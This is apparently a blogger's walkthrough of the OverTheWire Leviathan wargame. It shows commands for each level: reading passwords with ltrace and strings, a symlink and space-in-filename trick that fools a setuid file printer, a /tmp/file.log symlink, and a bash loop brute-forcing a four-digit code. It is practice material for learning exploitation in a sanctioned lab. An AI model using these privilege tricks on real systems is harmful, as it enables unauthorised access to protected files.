Over the Wire Leviathan walkthrough

This is the second easiest Over the Wire game. Again, I'm not going to explain how every command works. If you want to know, look at how I used it and use the man pages to figure out what all the flags are for.
Here we go to complete the overthewire game Leviathan. You can find this at http://overthewire.org/wargames/leviathan

Leviathan 0:

Leviathan0 gives us a simple username and password to log in with SSH. One tip I would like to add, is that I made a variable in the shell "level" and set it equal to "leviathan0". To log in with ssh, I type

$ ssh $level@leviathan.labs.overthewire.org.

With this, I am able to just edit the last character of the level each time I need to login, rather than move through the entire SSH command.

So, with the ssh command shown above, we are able to log in to leviathan0.

Leviathan 0 -> Leviathan 1:

Moving from leviathan 0 to leviathan 1 is fairly simple. Running ls -la we see that there is the directory .backup.

leviathan0@melinda:~$ ls -la
total 24
drwxr-xr-x   3 root root       4096 Jun  6  2013 .
drwxr-xr-x 160 root root       4096 Jul 28 17:05 ..
drwxr-x---   2 root leviathan0 4096 Jun  6  2013 .backup

Inside of this directory, there is the file bookmarks.html. Simply searching for the string password in that file gives us the password.

leviathan0@melinda:~$ cat .backup/bookmarks.html | grep password
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>

Leviathan 1 -> Leviathan 2:
Here we have a file named "check". We can run it and see what happens.

leviathan1@melinda:~$ ./check
password: asdf
Wrong password, Good Bye ...

Bummer. Let's run ltrace on it and see what is actually happening.

leviathan1@melinda:~$ ltrace ./check 
strcmp("asd", "sex")

There, we can see that it is running strcmp against the string "sex". Now if we use that as the password for the file, we will get a shell, of which we can cat the password.

leviathan1@melinda:~$ ./check
password: sex
$ cat /etc/leviathan_pass/leviathan2

Leviathan 2 -> Leviathan 3:

In this level, we have a file print file. Looking at it with ltrace, we see that it is calling the access function.

leviathan2@melinda:~$ ltrace ./printfile /tmp/zer0w1re123
access("/tmp/zer0w1re123", 4)
snprintf("/bin/cat /tmp/zer0w1re123", 511, "/bin/cat %s", "/tmp/zer0w1re123")                                           
system("/bin/cat /tmp/zer0w1re123")

From here we can see that it calls access to check that the file is there, and then it calls cat. If we can get access to continue, we can get cat to call our file. What we want to do is create a directory in /tmp.

leviathan2@melinda:~$ mkdir /tmp/zer0w1re_test

And then we will create two files. 'file' and 'file asdf'. File is going to be a symbolic link to our password file, and the second file needs to have the first file in the first half of the name. See below commands if you don't understand.

leviathan2@melinda:/tmp/zer0w1re_test$ ln -s /etc/leviathan_pass/leviathan3 ./file
leviathan2@melinda:/tmp/zer0w1re_test$ touch file\ asdf

Now we can run printfile on "file asdf". What this does is trick the access function into allowing us access, since "file asdf" exists. When it goes into the cat command, it treats it as two separate files, giving us access to the password through our symbolic link.

leviathan2@melinda:~$ ./printfile /tmp/zer0w1re_test/file\ asdf
/bin/cat: asdf: No such file or directory

And there's our password!

Leviathan 3 -> Leviathan 4:

leviathan3@melinda:~$ ltrace ./level3 
fgets(Enter the password> asdf
"asdf\n", 256, 0xf7fceac0)          = 0xffffd61c
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG)
leviathan3@melinda:~$ strings ./level3 
[You've got shell]!
bzzzzzzzzap. WRONG
Enter the password> 

Here we can see right before "[You've got shell]!" it says snlprintf. Maybe this is our password to get the shell?

leviathan3@melinda:~$ ./level3 
Enter the password> snlprintf
[You've got shell]!
$ cat /etc/leviathan_pass/leviathan4

Leviathan 4 -> Leviathan 5:

Here we have the folder '.trash' in our home directory. Inside there is a file 'bin'. When you run it you get a bunch of binary.

leviathan4@melinda:~$ ls -la
total 24
drwxr-xr-x   3 root root       4096 Jun  6  2013 .
drwxr-xr-x 160 root root       4096 Jul 28 17:05 ..
-rw-r--r--   1 root root        220 Apr  3  2012 .bash_logout
-rw-r--r--   1 root root       3486 Apr  3  2012 .bashrc
-rw-r--r--   1 root root        675 Apr  3  2012 .profile
dr-xr-x---   2 root leviathan4 4096 Jun  6  2013 .trash
leviathan4@melinda:~$ cd .trash
leviathan4@melinda:~/.trash$ ls
leviathan4@melinda:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010

There is a great website we can use to decode this called Crypo. It resides at http://crypo.in.ua. Using the ascii to binary conversion, we get the password: Tith4cokei

Leviathan 5 -> Leviathan 6:

There is a file called leviathan5. When we try to run it, it complains that it can't find /tmp/file.log.

leviathan5@melinda:~$ ./leviathan5 
Cannot find /tmp/file.log

We can try to make a symbolic link to our password file in that file.

leviathan5@melinda:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
leviathan5@melinda:~$ ./leviathan5 

Boom password!

Leviathan 6 -> Leviathan 7:

Here we have another file in the home directory, called leviathan6. If we try to run it, it asks for a four digit code as an argument. The only way I could think to solve this was brute force. We can create a bash one liner to accomplish this.

for i in {0000..9999}; do ./leviathan6 $i; echo $i; done

We could get rid of the "echo $i", but I just was interested in actually knowing which combo worked.

$ cat /etc/leviathan_pass/leviathan7

There we have a shell, and we have the password!

I hope you enjoyed working through these problems as much as I did. I'll be moving on to Natas or Krypton soon.